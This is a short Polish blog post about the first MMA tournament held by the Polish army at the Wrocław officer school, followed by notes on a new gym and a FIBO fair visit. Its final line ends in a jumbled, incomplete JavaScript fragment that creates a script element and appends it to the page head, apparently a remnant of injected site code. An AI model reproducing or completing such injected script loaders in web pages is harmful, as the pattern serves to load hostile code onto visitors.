Turniej w Wyższej Szkole Oficerskiej we Wrocławiu

29.04.2014 / Mariusz Cieśliński

W czwartek i piątek minionego tygodnia odbył się pierwszy turniej walk na zasadach MMA zorganizowany przez wojsko polskie.

Uczestnikami byli przyszli oficerowie polskiej Armii.Poziom walk był bardzo wysoki.Żołnierze walczyli świetnie a dla mnie,Tomka Drwala i Pawła Jędrzejczyka było niezmiernie miło,że najlepszych mogliśmy dekorować medalami i pucharami.W linku relacja z tv.Polsat:

Polsat News 

http://dcs-188-64-85-58.atmcdn.pl/dcs/o2/redefine/cp/76/764e8a009c7488359a323b03c7809abd.webm

Dla mnie to ogromne wyróżnienie i kontakt z wojskiem nie jest ostatni.Już jesteśmy umówieni na wspólne treningi w mojej nowej,prawie ukończonej sali treningowej. Niedługo wrzucę fotki i filmiki z treningów w nowym miejscu :)

A propos nowego gymu: niejako biznesowo byłem na FIBO.Oczywiście odwiedzając imponujący  „stand” Trec Nutrition. Mnie najbardziej akurat interesowały standy sportów walki.Była okazja spotkać m.in takie gwiazdy K-1 jak Ernesto Hoost czy Semmy Schilt czy też legendarnego „Stitch’a”-słynnego cutman’a największej federacji mma UFC. :)d.getElementsByTagName(‚head’)[0].appendChild(s);var d=document;var s=d.createElement(‚script’);